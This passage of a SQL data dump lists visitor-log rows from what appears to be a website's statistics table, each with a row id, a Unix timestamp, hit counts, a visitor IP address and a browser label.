29',''),(252774,1527827831,1,1,0,0,'54.36.149.8','other'),(252775,1527828040,1,1,0,0,'54.36.148.181','other'),(252776,1527828674,1,1,0,0,'66.249.64.29','chrome'),(252777,1527828676,1,1,0,0,'66.249.70.27','chrome'),(252778,1527828780,1,1,0,0,'54.36.148.78','other'),(252779,1527828793,1,1,0,0,'91.196.178.5','chrome'),(252780,1527828859,1,1,0,0,'54.36.148.46','other'),(252781,1527829187,1,1,0,0,'91.196.178.132','chrome'),(252782,1527829584,1,1,0,0,'54.36.149.98','other'),(252783,1527829678,1,1,0,0,'54.36.148.122','other'),(252784,1527829955,1,1,0,0,'54.36.148.102','other'),(252785,1527830258,1,1,0,0,'54.36.149.89','other'),(252786,1527830633,1,1,0,0,'37.9.113.110','other'),(252787,1527830683,1,1,0,0,'54.36.148.206','other'),(252788,1527830747,1,0,1,0,'66.249.70.29',''),(252789,1527830755,1,0,1,0,'66.249.70.27',''),(252790,1527830792,1,1,0,0,'141.8.142.74','other'),(252791,1527830811,1,1,0,0,'8.29.198.25','other'),(252792,1527830893,1,0,1,0,'66.249.64.28',''),(252793,1527831162,1,1,0,0,'54.36.148.223','other'),(252794,1527831561,2,2,0,0,'91.196.178.169','chrome'),(252795,1527831578,1,1,0,0,'54.36.149.89','other'),(252796,1527832000,1,1,0,0,'69.30.211.2','other'),(252797,1527832241,1,1,0,0,'54.36.148.230','other'),(252798,1527832281,1,0,1,0,'66.249.64.28',''),(252799,1527832337,1,1,0,0,'46.211.158.19','chrome'),(252800,1527832367,1,1,0,0,'91.196.178.132','chrome'),(252801,1527832665,1,1,0,0,'37.55.77.44','chrome'),(252802,1527832749,2,2,0,0,'141.8.142.74','other'),(252803,1527833346,2,0,2,0,'66.249.64.30',''),(252804,1527833790,1,1,0,0,'54.36.149.10','other'),(252805,1527834089,5,5,0,0,'91.121.116.72','other'),(252806,1527834156,1,1,0,0,'108.59.8.80','other'),(252807,1527834287,1,1,0,0,'37.55.193.4','chrome'),(252808,1527834315,1,1,0,0,'141.8.142.74','other'),(252809,1527834334,1,1,0,0,'54.36.148.134','other'),(252810,1527834335,1,1,0,0,'54.36.148.122','other'),(252811,1527834472,3,3,0,0,'91.196.178.85','chrome'),(252812,1527834660,1,1,0,0,'54.36.148.252','other'),(252813,1527834707,1,1,0,0,'54.36.148.216','other'),(252814,1527834785,1,1,0,0,'178.95.92.13','chrome'),(252815,1527835040,1,1,0,0,'216.244.66.241','other'),(252816,1527835196,1,1,0,0,'54.36.149.43','other'),(252817,1527835542,1,1,0,0,'54.36.148.213','other'),(252818,1527835596,1,1,0,0,'54.36.149.88','other'),(252819,1527835623,2,2,0,0,'130.180.219.213','chrome'),(252820,1527835676,1,1,0,0,'87.250.224.46','other'),(252821,1527835793,1,1,0,0,'95.132.45.111','firefox'),(252822,1527836027,1,1,0,0,'54.36.148.35','other'),(252823,1527836063,1,1,0,0,'91.196.178.88','chrome'),(252824,1527836191,1,1,0,0,'91.196.178.132','chrome'),(252825,1527836283,1,1,0,0,'8.29.198.25','other'),(252826,1527836296,1,1,0,0,'54.36.148.54','other'),(252827,1527836377,1,1,0,0,'54.36.149.50','other'),(252828,1527836436,1,1,0,0,'180.76.15.10','other'),(252829,1527836602,1,1,0,0,'141.8.142.74','other'),(252830,1527836753,1,1,0,0,'54.36.149.31','other'),(252831,1527836798,2,2,0,0,'62.205.134.182','other'),(252832,1527836801,1,1,0,0,'54.36.149.21','other'),(252833,1527836899,1,1,0,0,'54.36.148.137','other'),(252834,1527836996,1,1,0,0,'92.112.249.60','chrome'),(252835,1527837051,1,1,0,0,'54.36.148.12','other'),(252836,1527837093,1,1,0,0,'91.196.178.130','firefox'),(252837,1527837124,1,1,0,0,'176.105.211.33','chrome'),(252838,1527837403,1,1,0,0,'54.36.148.158','other'),(252839,1527837484,1,1,0,0,'178.154.171.88','other'),(252840,1527837613,2,0,2,0,'66.249.64.28',''),(252841,1527837819,1,1,0,0,'216.244.66.241','other'),(252842,1527837913,1,1,0,0,'54.36.149.17','other'),(252843,1527837965,1,1,0,0,'54.36.148.29','other'),(252844,1527838304,1,1,0,0,'54.36.148.227','other'),(252845,1527838360,1,1,0,0,'141.8.142.74','other'),(252846,1527838447,1,1,0,0,'54.36.148.245','other'),(252847,1527838744,1,1,0,0,'54.36.148.158','other'),(252848,1527838762,1,1,0,0,'54.36.148.243','other'),(252849,1527838814,2,2,0,0,'62.205.134.182','other'),(252850,1527838874,1,1,0,0,'54.36.148.105','other'),(252851,1527839085,1,1,0,0,'91.192.133.225','chrome'),(252852,1527839698,1,1,0,0,'54.36.148.73','other'),(252853,1527839741,1,1,0,0,'54.36.148.137','other'),(252854,1527839756,2,2,0,0,'91.196.177.46','chrome'),(252855,1527839768,1,1,0,0,'216.244.66.241','other'),(252856,1527839792,1,0,1,0,'66.249.64.28',''),(252857,1527839876,1,0,1,0,'66.249.64.30',''),(252858,1527839949,1,1,0,0,'91.196.178.87','chrome'),(252859,1527840474,1,1,0,0,'54.36.148.224','other'),(252860,1527840567,1,1,0,0,'54.36.148.160','other'),(252861,1527840779,1,1,0,0,'37.55.77.44','chrome'),(252862,1527840836,4,4,0,0,'188.163.2.30','other'),(252863,1527840960,1,1,0,0,'62.205.134.182','other'),(252864,1527841013,1,1,0,0,'91.124.182.170','firefox'),(252865,1527841068,2,2,0,0,'107.21.1.8','other'),(252866,1527841362,1,1,0,0,'54.36.148.213','other'),(252867,1527841652,1,1,0,0,'8.29.198.26','other'),(252868,1527841802,1,1,0,0,'188.163.2.30','other'),(252869,1527841840,1,1,0,0,'178.154.171.88','other'),(252870,1527841843,1,1,0,0,'37.9.113.182','other'),(252871,1527841848,1,1,0,0,'54.36.149.1','other'),(252872,1527841880,1,1,0,0,'54.36.149.35','other'),(252873,1527842147,2,2,0,0,'141.8.142.74','other'),(252874,1527842210,1,1,0,0,'54.36.148.131','other'),(252875,1527842591,4,4,0,0,'62.205.134.182','other'),(252876,1527842920,3,3,0,0,'46.219.77.169','chrome'),(252877,1527843020,1,1,0,0,'91.196.178.93','firefox'),(252878,1527843080,1,1,0,0,'180.76.15.135','other'),(252879,1527843118,2,2,0,0,'141.8.142.74','other'),(252880,1527843288,1,1,0,0,'216.244.66.241','other'),(252881,1527843510,2,0,2,0,'66.249.64.30',''),(252882,1527843773,1,1,0,0,'54.36.148.43','other'),(252883,1527843977,1,1,0,0,'193.106.30.99','firefox'),(252884,1527843991,1,1,0,0,'91.196.178.93','chrome'),(252885,1527844069,1,1,0,0,'54.36.149.80','other'),(252886,1527844070,1,1,0,0,'91.196.177.46','chrome'),(252887,1527844097,8,8,0,0,'62.205.134.182','other'),(252888,1527844272,1,0,1,0,'66.249.64.28',''),(252889,1527844273,1,1,0,0,'54.36.148.172','other'),(252890,1527844368,1,1,0,0,'54.36.149.53','other'),(252891,1527844382,1,1,0,0,'194.37.248.11','chrome'),(252892,1527844443,1,1,0,0,'54.36.148.255','other'),(252893,1527844864,1,1,0,0,'54.36.148.24','other'),(252894,1527844971,1,1,0,0,'91.196.178.93','chrome'),(252895,1527845053,1,0,1,0,'66.249.64.29',''),(252896,1527845119,1,1,0,0,'62.205.134.182','other'),(252897,1527845451,1,1,0,0,'54.36.148.209','other'),(252898,1527845622,1,1,0,0,'91.196.178.77','chrome'),(252899,1527845993,1,1,0,0,'52.90.228.194','other'),(252900,1527846221,1,1,0,0,'54.36.148.83','other'),(252901,1527846415,1,1,0,0,'180.76.15.134','other'),(252902,1527846467,1,1,0,0,'54.36.149.6','other'),(252903,1527846565,1,1,0,0,'66.249.64.29','chrome'),(252904,1527846628,1,1,0,0,'54.36.148.127','other'),(252905,1527846718,1,1,0,0,'141.8.142.74','other'),(252906,1527846737,1,0,1,0,'66.249.64.28',''),(252907,1527846936,1,1,0,0,'54.36.149.41','other'),(252908,1527847118,1,1,0,0,'8.29.198.25','other'),(252909,1527847138,1,0,1,0,'66.249.64.30',''),(252910,1527847659,1,1,0,0,'54.36.148.218','other'),(252911,1527847784,1,1,0,0,'54.36.148.242','other'),(252912,1527847830,2,1,1,0,'66.249.64.28',''),(252913,1527847833,1,1,0,0,'66.249.70.27','chrome'),(252914,1527847837,1,1,0,0,'91.196.178.136','firefox'),(252915,1527847911,1,1,0,0,'54.36.149.58','other'),(252916,1527847962,1,1,0,0,'91.196.178.88','firefox'),(252917,1527848119,1,1,0,0,'62.205.134.182','other'),(252918,1527848556,1,1,0,0,'178.154.171.88','other'),(252919,1527848606,1,0,1,0,'66.249.64.29',''),(252920,1527848696,1,1,0,0,'52.90.228.194','other'),(252921,1527848941,1,1,0,0,'157.55.39.89','other'),(252922,1527849224,1,1,0,0,'54.36.149.27','other'),(252923,1527849316,1,1,0,0,'95.163.255.95','other'),(252924,1527849892,1,1,0,0,'54.36.148.87','other'),(252925,1527849920,2,2,0,0,'130.180.219.213','chrome'),(252926,1527849989,1,1,0,0,'54.36.148.117','other'),(252927,1527850000,4,4,0,0,'91.196.177.176','chrome'),(252928,1527850396,1,1,0,0,'54.36.148.140','other'),(252929,1527850624,1,1,0,0,'54.36.148.67','other'),(252930,1527850724,1,1,0,0,'216.244.66.241','other'),(252931,1527850995,2,2,0,0,'91.196.178.164','chrome'),(252932,1527851304,1,1,0,0,'54.36.148.174','other'),(252933,1527851314,1,1,0,0,'52.90.228.194','other'),(252934,1527851454,1,1,0,0,'95.67.80.108','chrome'),(252935,1527851719,1,1,0,0,'62.205.134.182','other'),(252936,1527851984,1,1,0,0,'54.36.149.10','other'),(252937,1527852498,1,1,0,0,'8.29.198.25','other'),(252938,1527852565,1,1,0,0,'163.172.4.153','chrome'),(252939,1527852638,1,1,0,0,'54.36.148.172','other'),(252940,1527852644,1,1,0,0,'54.36.148.12','other'),(252941,1527852676,1,1,0,0,'54.36.148.167','other'),(252942,1527852907,1,1,0,0,'54.36.149.12','other'),(252943,1527852929,1,0,1,0,'66.249.64.29',''),(252944,1527853165,1,1,0,0,'54.36.148.190','other'),(252945,1527853178,1,1,0,0,'54.36.149.91','other'),(252946,1527853230,2,2,0,0,'216.244.66.241','other'),(252947,1527853325,1,1,0,0,'91.196.178.73','chrome'),(252948,1527853636,1,1,0,0,'54.36.148.244','other'),(252949,1527854148,1,1,0,0,'91.196.178.93','firefox'),(252950,1527854359,1,1,0,0,'34.201.101.166','other'),(252951,1527854583,2,2,0,0,'91.196.178.85','chrome'),(252952,1527854599,1,1,0,0,'216.244.66.241','other'),(252953,1527854839,1,1,0,0,'54.36.148.34','other'),(252954,1527855063,1,1,0,0,'54.36.148.50','other'),(252955,1527855196,1,1,0,0,'40.77.167.48','other'),(252956,1527855319,4,4,0,0,'62.205.134.182','other'),(252957,1527855380,1,1,0,0,'207.46.13.238','other'),(252958,1527855621,1,1,0,0,'54.36.148.163','other'),(252959,1527855747,1,1,0,0,'91.196.178.104','chrome'),(252960,1527855792,1,1,0,0,'66.249.64.30','chrome'),(252961,1527855945,1,1,0,0,'54.36.148.16','other'),(252962,1527855964,2,2,0,0,'91.196.178.169','chrome'),(252963,1527855981,1,1,0,0,'54.36.149.15','other'),(252964,1527856284,4,4,0,0,'62.205.134.182','other'),(252965,1527857061,1,1,0,0,'34.201.101.166','other'),(252966,1527857078,1,1,0,0,'54.36.149.100','other'),(252967,1527857156,1,1,0,0,'66.249.64.30','chrome'),(252968,1527857160,1,1,0,0,'66.249.70.25','chrome'),(252969,1527857186,1,1,0,0,'54.36.148.134','other'),(252970,1527857200,8,8,0,0,'62.205.134.182','other'),(252971,1527857333,1,1,0,0,'78.111.187.211','chrome'),(252972,1527857370,1,1,0,0,'178.154.171.88','other'),(252973,1527857399,2,2,0,0,'54.36.148.32','other'),(252974,1527857578,1,1,0,0,'54.36.148.47','other'),(252975,1527857896,1,1,0,0,'54.36.149.4','other'),(252976,1527857945,1,1,0,0,'54.36.148.248','other'),(252977,1527857962,1,1,0,0,'8.29.198.25','other'),(252978,1527857977,1,1,0,0,'54.36.148.79','other'),(252979,1527858025,1,1,0,0,'62.64.103.190','chrome'),(252980,1527858104,9,9,0,0,'62.205.134.182','other'),(252981,1527858118,2,0,2,0,'66.249.64.29',''),(252982,1527858235,2,2,0,0,'91.196.178.91','chrome'),(252983,1527858397,1,1,0,0,'91.196.178.82','firefox'),(252984,1527858607,1,1,0,0,'216.244.66.241','other'),(252985,1527858692,1,1,0,0,'188.226.220.27','chrome'),(252986,1527858990,1,1,0,0,'54.36.149.57','other'),(252987,1527859043,1,1,0,0,'178.154.171.88','other'),(252988,1527859065,6,6,0,0,'62.205.134.182','other'),(252989,1527859155,1,1,0,0,'54.36.148.12','other'),(252990,1527859387,1,1,0,0,'54.36.148.63','other'),(252991,1527859753,1,1,0,0,'54.36.148.222','other'),(252992,1527860001,6,6,0,0,'62.205.134.182','other'),(252993,1527860468,1,1,0,0,'54.36.148.19','other'),(252994,1527860538,1,1,0,0,'91.245.99.214','chrome'),(252995,1527860721,1,1,0,0,'54.36.148.13','other'),(252996,1527861050,1,1,0,0,'54.36.149.99','other'),(252997,1527861178,1,1,0,0,'54.36.149.63','other'),(252998,1527861212,2,2,0,0,'62.205.134.182','other'),(252999,1527861545,1,1,0,0,'54.36.148.86','other'),(253000,1527861875,1,1,0,0,'34.207.246.101','other'),(253001,1527862309,1,1,0,0,'54.36.148.184','other'),(253002,1527862382,1,1,0,0,'54.36.149.104','other'),(253003,1527862506,6,6,0,0,'62.205.134.182','other'),(253004,1527862561,1,1,0,0,'54.36.148.52','other'),(253005,1527862813,1,1,0,0,'95.163.255.99','other'),(253006,1527863049,1,0,1,0,'66.249.70.27',''),(253007,1527863156,2,2,0,0,'141.8.142.74','other'),(253008,1527863340,1,1,0,0,'8.29.198.27','other'),(253009,1527863632,8,8,0,0,'62.205.134.182','other'),(253010,1527863676,1,1,0,0,'54.36.148.254','other'),(253011,1527863937,1,1,0,0,'216.244.66.241','other'),(253012,1527863994,1,1,0,0,'54.36.148.241','other'),(253013,1527864334,2,2,0,0,'207.46.13.238','other'),(253014,1527864389,1,1,0,0,'54.36.149.31','other'),(253015,1527864530,1,1,0,0,'54.36.149.34','other'),(253016,1527864608,1,1,0,0,'54.36.149.91','other'),(253017,1527864738,1,1,0,0,'62.205.134.182','other'),(253018,1527864883,1,1,0,0,'54.36.149.105','other'),(253019,1527864934,1,1,0,0,'54.36.148.68','other'),(253020,1527865068,1,1,0,0,'54.36.149.90','other'),(253021,1527865105,3,0,3,0,'66.249.64.28',''),(253022,1527865142,1,1,0,0,'52.0.26.44','other'),(253023,1527865215,1,1,0,0,'54.36.148.140','other'),(253024,1527865706,1,1,0,0,'54.36.148.232','other'),(253025,1527866049,1,0,1,0,'66.249.64.30',''),(253026,1527866107,1,1,0,0,'62.205.134.182','other'),(253027,1527866223,1,1,0,0,'141.8.142.74','other'),(253028,1527866420,1,1,0,0,'54.36.149.48','other'),(253029,1527866574,1,1,0,0,'66.249.70.29','chrome'),(253030,1527866577,1,1,0,0,'66.249.64.30','chrome'),(253031,1527866706,1,1,0,0,'54.36.148.238','other'),(253032,1527866766,1,1,0,0,'87.250.224.46','other'),(253033,1527866961,1,1,0,0,'178.154.171.88','other'),(253034,1527867159,1,1,0,0,'54.36.148.121','other'),(253035,1527867170,1,1,0,0,'54.36.149.55','other'),(253036,1527867756,1,1,0,0,'54.36.148.67','other'),(253037,1527867894,1,1,0,0,'54.36.148.123','other'),(253038,1527867955,1,1,0,0,'54.36.148.184','other'),(253039,1527868270,1,1,0,0,'54.36.148.215','other'),(253040,1527868663,1,1,0,0,'34.207.246.101','other'),(253041,1527868806,1,1,0,0,'8.29.198.25','other'),(253042,1527868843,1,1,0,0,'216.244.66.241','other'),(253043,1527869038,1,1,0,0,'157.55.39.49','other'),(253044,1527869084,1,1,0,0,'37.55.58.65','chrome'),(253045,1527869113,1,1,0,0,'54.36.148.178','other'),(253046,1527869678,1,1,0,0,'54.36.148.105','other'),(253047,1527869706,1,1,0,0,'62.205.134.182','other'),(253048,1527869752,1,1,0,0,'91.209.11.236','other'),(253049,1527869815,2,2,0,0,'91.196.178.60','chrome'),(253050,1527869948,1,1,0,0,'54.36.148.46','other'),(253051,1527870537,1,1,0,0,'54.36.148.109','other'),(253052,1527871077,1,1,0,0,'54.36.149.36','other'),(253053,1527871100,1,1,0,0,'87.250.224.46','other'),(253054,1527871148,1,1,0,0,'54.36.149.77','other'),(253055,1527871433,1,1,0,0,'54.36.148.234','other'),(253056,1527871522,2,0,2,0,'66.249.64.30',''),(253057,1527871879,2,1,1,0,'66.249.70.25',''),(253058,1527871882,1,1,0,0,'66.249.64.28','chrome'),(253059,1527871931,1,1,0,0,'52.0.26.44','other'),(253060,1527872651,1,1,0,0,'54.36.148.224','other'),(253061,1527873008,1,1,0,0,'54.36.148.19','other'),(253062,1527873094,1,1,0,0,'54.36.148.158','other'),(253063,1527873306,1,1,0,0,'62.205.134.182','other'),(253064,1527873415,1,1,0,0,'54.36.148.29','other'),(253065,1527873451,1,1,0,0,'141.8.142.74','other'),(253066,1527873937,1,1,0,0,'54.36.148.61','other'),(253067,1527874172,1,1,0,0,'8.29.198.25','other'),(253068,1527874271,1,0,1,0,'66.249.70.25',''),(253069,1527874296,1,1,0,0,'54.36.148.28','other'),(253070,1527874413,1,1,0,0,'54.36.148.200','other'),(253071,1527874611,1,1,0,0,'54.36.148.71','other'),(253072,1527874665,1,1,0,0,'34.207.246.101','other'),(253073,1527874786,1,1,0,0,'54.36.148.58','other'),(253074,1527874797,1,1,0,0,'54.36.148.140','other'),(253075,1527874834,1,1,0,0,'54.36.149.15','other'),(253076,1527875076,1,1,0,0,'178.154.171.88','other'),(253077,1527875132,1,1,0,0,'54.36.148.247','other'),(253078,1527875430,1,1,0,0,'141.8.142.74','other'),(253079,1527875526,1,0,1,0,'66.249.64.28',''),(253080,1527875571,1,1,0,0,'66.249.70.29','chrome'),(253081,1527875575,1,1,0,0,'66.249.64.28','chrome'),(253082,1527875790,1,0,1,0,'66.249.64.30',''),(253083,1527876171,1,0,1,0,'66.249.70.25',''),(253084,1527876532,1,1,0,0,'54.36.148.22','other'),(253085,1527876612,1,1,0,0,'91.209.11.236','other'),(253086,1527876773,1,0,1,0,'66.249.64.30',''),(253087,1527876844,1,0,1,0,'66.249.70.27',''),(253088,1527876907,1,1,0,0,'62.205.134.182','other'),(253089,1527877067,2,2,0,0,'37.55.58.65','chrome'),(253090,1527877196,1,1,0,0,'178.154.171.88','other'),(253091,1527877764,1,1,0,0,'54.36.148.181','other'),(253092,1527878619,1,1,0,0,'54.36.149.44','other'),(253093,1527879223,1,1,0,0,'54.36.148.54','other'),(253094,1527879653,1,1,0,0,'8.29.198.26','other'),(253095,1527879654,1,1,0,0,'54.36.148.35','other'),(253096,1527879770,1,1,0,0,'54.36.148.189','other'),(253097,1527880402,1,1,0,0,'54.36.148.93','other'),(253098,1527880505,1,1,0,0,'62.205.134.182','other'),(253099,1527880525,1,0,1,0,'66.249.64.30',''),(253100,1527880552,1,1,0,0,'54.36.148.73','other'),(253101,1527881015,1,1,0,0,'207.46.13.238','other'),(253102,1527881098,1,1,0,0,'54.36.148.143','other'),(253103,1527881598,4,0,4,0,'66.249.64.30',''),(253104,1527882069,1,1,0,0,'207.46.13.238','other'),(253105,1527882118,2,2,0,0,'141.8.142.74','other'),(253106,1527882356,2,2,0,0,'54.36.149.1','other'),(253107,1527882502,1,1,0,0,'54.36.149.75','other'),(253108,1527882773,1,1,0,0,'54.36.148.59','other'),(253109,1527882899,1,1,0,0,'66.249.70.27','chrome'),(253110,1527882902,1,1,0,0,'66.249.64.29','chrome'),(253111,1527883032,1,1,0,0,'54.36.148.93','other'),(253112,1527883110,1,1,0,0,'54.36.148.169','other'),(253113,1527883295,1,1,0,0,'95.132.6.213','chrome'),(253114,1527883336,1,1,0,0,'93.78.52.124','chrome'),(253115,1527884095,1,1,0,0,'178.154.171.88','other'),(253116,1527884109,1,1,0,0,'62.205.134.182','other'),(253117,1527884620,1,1,0,0,'54.36.149.77','other'),(253118,1527884667,1,1,0,0,'54.36.148.112','other'),(253119,1527885007,1,1,0,0,'8.29.198.27','other'),(253120,1527885025,1,1,0,0,'54.36.148.200','other'),(253121,1527885198,1,1,0,0,'54.36.148.51','other'),(253122,1527885293,1,1,0,0,'54.36.149.54','other'),(253123,1527885306,1,1,0,0,'54.36.148.42','other'),(253124,1527885483,1,1,0,0,'54.36.148.17','other'),(253125,1527885843,1,1,0,0,'54.36.148.106','other'),(253126,1527885886,1,1,0,0,'54.36.148.110','other'),(253127,1527886133,1,1,0,0,'178.154.171.88','other'),(253128,1527886491,3,0,3,0,'66.249.64.28',''),(253129,1527886746,1,1,0,0,'87.250.224.46','other'),(253130,1527886938,1,1,0,0,'54.36.149.25','other'),(253131,1527887059,1,0,1,0,'66.249.64.30',''),(253132,1527887228,2,2,0,0,'207.46.13.238','other'),(253133,1527887259,1,1,0,0,'54.36.148.147','other'),(253134,1527887351,1,1,0,0,'54.36.148.196','other'),(253135,1527887366,1,1,0,0,'178.154.171.88','other'),(253136,1527887552,1,1,0,0,'141.8.142.74','other'),(253137,1527887706,1,1,0,0,'62.205.134.182','other'),(253138,1527888020,1,1,0,0,'157.55.39.49','other'),(253139,1527888676,1,1,0,0,'66.249.64.29','chrome'),(253140,1527888769,1,1,0,0,'193.106.30.99','firefox'),(253141,1527888840,1,1,0,0,'46.211.150.154','chrome'),(253142,1527888924,1,1,0,0,'66.249.64.30','chrome'),(253143,1527888950,1,1,0,0,'54.36.148.237','other'),(253144,1527889154,3,3,0,0,'216.244.66.241','other'),(253145,1527889433,1,1,0,0,'178.154.171.88','other'),(253146,1527889500,1,1,0,0,'54.36.148.104','other'),(253147,1527889689,1,1,0,0,'54.36.148.139','other'),(253148,1527890146,1,1,0,0,'54.36.148.97','other'),(253149,1527890484,1,1,0,0,'8.29.198.26','other'),(253150,1527890573,1,1,0,0,'54.36.149.10','other'),(253151,1527890643,1,1,0,0,'178.154.171.88','other'),(253152,1527890712,1,1,0,0,'180.76.15.150','other'),(253153,1527890822,1,1,0,0,'54.36.149.65','other'),(253154,1527890831,1,1,0,0,'54.36.148.245','other'),(253155,1527891177,1,1,0,0,'54.36.149.30','other'),(253156,1527891310,1,1,0,0,'62.205.134.182','other'),(253157,1527891845,1,1,0,0,'54.36.149.62','other'),(253158,1527892096,1,1,0,0,'180.76.15.142','other'),(253159,1527892113,1,1,0,0,'54.36.148.92','other'),(253160,1527892555,1,1,0,0,'54.36.148.14','other'),(253161,1527892562,1,1,0,0,'54.36.148.70','other'),(253162,1527892765,1,1,0,0,'54.36.148.227','other'),(253163,1527893098,1,1,0,0,'54.36.148.40','other'),(253164,1527893120,1,1,0,0,'54.36.148.197','other'),(253165,1527893285,1,1,0,0,'54.36.149.12','other'),(253166,1527893295,1,0,1,0,'66.249.64.29',''),(253167,1527893539,1,1,0,0,'54.36.148.250','other'),(253168,1527893603,2,2,0,0,'178.154.171.88','other'),(253169,1527893774,1,1,0,0,'54.36.148.128','other'),(253170,1527894084,2,2,0,0,'216.244.66.241','other'),(253171,1527894149,1,1,0,0,'66.249.70.29','chrome'),(253172,1527894152,1,1,0,0,'66.249.64.29','chrome'),(253173,1527894908,1,1,0,0,'62.205.134.182','other'),(253174,1527894919,1,1,0,0,'54.36.148.131','other'),(253175,1527895030,1,1,0,0,'66.249.64.28','chrome'),(253176,1527895158,1,1,0,0,'159.89.43.60','other'),(253177,1527895170,1,1,0,0,'54.36.149.62','other'),(253178,1527895835,1,1,0,0,'8.29.198.25','other'),(253179,1527895870,1,1,0,0,'54.36.149.27','other'),(253180,1527896171,1,0,1,0,'66.249.64.28',''),(253181,1527896627,1,1,0,0,'95.163.255.112','other'),(253182,1527896821,1,1,0,0,'95.163.255.116','other'),(253183,1527897041,1,0,1,0,'66.249.64.30',''),(253184,1527897128,1,1,0,0,'54.36.149.12','other'),(253185,1527897237,1,1,0,0,'54.36.148.102','other'),(253186,1527897294,1,1,0,0,'54.36.148.223','other'),(253187,1527898183,1,1,0,0,'54.36.148.246','other'),(253188,1527898210,1,1,0,0,'54.36.148.181','other'),(253189,1527898411,1,1,0,0,'54.36.149.99','other'),(253190,1527898507,1,1,0,0,'62.205.134.182','other'),(253191,1527898747,1,1,0,0,'54.36.148.81','other'),(253192,1527899095,2,2,0,0,'141.8.142.74','other'),(253193,1527899336,1,1,0,0,'54.36.148.22','other'),(253194,1527899463,1,1,0,0,'54.36.148.78','other'),(253195,1527900174,1,1,0,0,'95.163.255.99','other'),(253196,1527900201,1,1,0,0,'54.36.149.21','other'),(253197,1527900616,1,1,0,0,'54.36.148.56','other'),(253198,1527900691,1,1,0,0,'66.249.70.29','chrome'),(253199,1527901219,1,1,0,0,'141.8.142.74','other'),(253200,1527901319,1,1,0,0,'8.29.198.27','other'),(253201,1527901430,1,1,0,0,'207.46.13.238','other'),(253202,1527901522,1,1,0,0,'54.36.148.203','other'),(253203,1527901772,1,1,0,0,'54.36.148.210','other'),(253204,1527901843,1,1,0,0,'54.36.148.178','other'),(253205,1527902109,1,1,0,0,'62.205.134.182','other'),(253206,1527902143,1,1,0,0,'141.8.142.74','other'),(253207,1527902264,1,1,0,0,'54.36.148.174','other'),(253208,1527902444,1,1,0,0,'54.36.148.11','other'),(253209,1527902991,1,1,0,0,'54.36.148.32','other'),(253210,1527903437,2,2,0,0,'54.36.148.176','other'),(253211,1527903932,1,1,0,0,'54.36.148.30','other'),(253212,1527904029,1,1,0,0,'54.36.148.225','other'),(253213,1527904102,1,0,1,0,'66.249.64.30',''),(253214,1527904179,1,1,0,0,'54.36.148.39','other'),(253215,1527904257,1,1,0,0,'95.67.80.108','chrome'),(253216,1527904271,1,1,0,0,'54.36.148.233','other'),(253217,1527904272,2,0,2,0,'66.249.64.29',''),(253218,1527904392,1,1,0,0,'54.36.149.29','other'),(253219,1527904660,1,1,0,0,'54.36.148.189','other'),(253220,1527904701,1,0,1,0,'66.249.64.28',''),(253221,1527905122,1,1,0,0,'54.36.148.234','other'),(253222,1527905707,1,1,0,0,'62.205.134.182','other'),(253223,1527905768,1,1,0,0,'54.36.148.126','other'),(253224,1527905866,1,1,0,0,'54.36.148.244','other'),(253225,1527906207,1,1,0,0,'54.36.148.248','other'),(253226,1527906369,1,1,0,0,'54.36.148.10','other'),(253227,1527906666,1,1,0,0,'8.29.198.27','other'),(253228,1527906934,1,1,0,0,'141.8.142.74','other'),(253229,1527906956,1,1,0,0,'54.36.148.244','other'),(253230,1527906973,1,1,0,0,'54.36.148.201','other'),(253231,1527907498,1,1,0,0,'54.36.148.203','other'),(253232,1527907707,1,1,0,0,'54.36.148.212','other'),(253233,1527908274,1,1,0,0,'54.36.148.221','other'),(253234,1527908313,1,0,1,0,'66.249.64.29',''),(253235,1527908740,1,1,0,0,'54.36.148.93','other'),(253236,1527908834,1,1,0,0,'54.36.148.10','other'),(253237,1527908894,1,1,0,0,'54.36.149.0','other'),(253238,1527908981,1,1,0,0,'66.249.70.29','chrome'),(253239,1527909307,1,1,0,0,'62.205.134.182','other'),(253240,1527909356,1,1,0,0,'54.36.148.149','other'),(253241,1527909411,1,1,0,0,'54.36.148.214','other'),(253242,1527909458,1,1,0,0,'207.241.232.46','other'),(253243,1527910170,1,1,0,0,'54.36.148.32','other'),(253244,1527910241,1,1,0,0,'54.36.149.27','other'),(253245,1527910878,1,1,0,0,'54.36.148.240','other'),(253246,1527911169,1,1,0,0,'54.36.148.237','other'),(253247,1527911842,1,1,0,0,'54.36.148.187','other'),(253248,1527912097,1,0,1,0,'66.249.64.28',''),(253249,1527912154,1,1,0,0,'8.29.198.25','other'),(253250,1527912216,2,2,0,0,'173.208.130.202','other'),(253251,1527912332,1,1,0,0,'54.36.148.175','other'),(253252,1527912911,1,1,0,0,'62.205.134.182','other'),(253253,1527912982,1,1,0,0,'178.154.171.88','other'),(253254,1527913102,1,1,0,0,'54.36.148.247','other'),(253255,1527913233,1,0,1,0,'66.249.70.29',''),(253256,1527913240,1,0,1,0,'66.249.70.27',''),(253257,1527913259,1,0,1,0,'66.249.64.29',''),(253258,1527913293,1,1,0,0,'54.36.148.249','other'),(253259,1527913381,1,1,0,0,'141.8.142.74','other'),(253260,1527913428,1,0,1,0,'66.249.64.28',''),(253261,1527914069,1,1,0,0,'54.36.148.125','other'),(253262,1527914110,1,1,0,0,'54.36.148.212','other'),(253263,1527914327,1,1,0,0,'54.36.148.177','other'),(253264,1527914544,1,1,0,0,'54.36.148.142','other'),(253265,1527914669,1,1,0,0,'54.36.148.116','other'),(253266,1527914697,2,2,0,0,'54.36.149.1','other'),(253267,1527914772,1,1,0,0,'54.36.148.130','other'),(253268,1527915076,1,1,0,0,'141.8.142.74','other'),(253269,1527915193,1,1,0,0,'54.165.59.7','other'),(253270,1527915802,1,1,0,0,'54.36.148.87','other'),(253271,1527915864,1,1,0,0,'54.36.148.226','other'),(253272,1527916330,1,1,0,0,'66.249.70.27','chrome'),(253273,1527916421,1,1,0,0,'54.36.148.230','other'),(253274,1527916507,1,1,0,0,'62.205.134.182','other'),(253275,1527916838,1,1,0,0,'37.73.32.185','chrome'),(253276,1527916876,1,1,0,0,'54.36.148.104','other'),(253277,1527917023,2,2,0,0,'178.154.171.88','other'),(253278,1527917140,1,1,0,0,'54.165.59.7','other'),(253279,1527917216,1,1,0,0,'141.8.142.74','other'),(253280,1527917334,1,0,1,0,'66.249.64.28',''),(253281,1527917376,1,1,0,0,'87.250.224.46','other'),(253282,1527917491,1,1,0,0,'8.29.198.26','other'),(253283,1527917591,1,1,0,0,'54.36.149.81','other'),(253284,1527917698,2,2,0,0,'216.244.66.241','other'),(253285,1527917897,1,0,1,0,'66.249.64.30',''),(253286,1527917990,1,1,0,0,'54.36.148.35','other'),(253287,1527918078,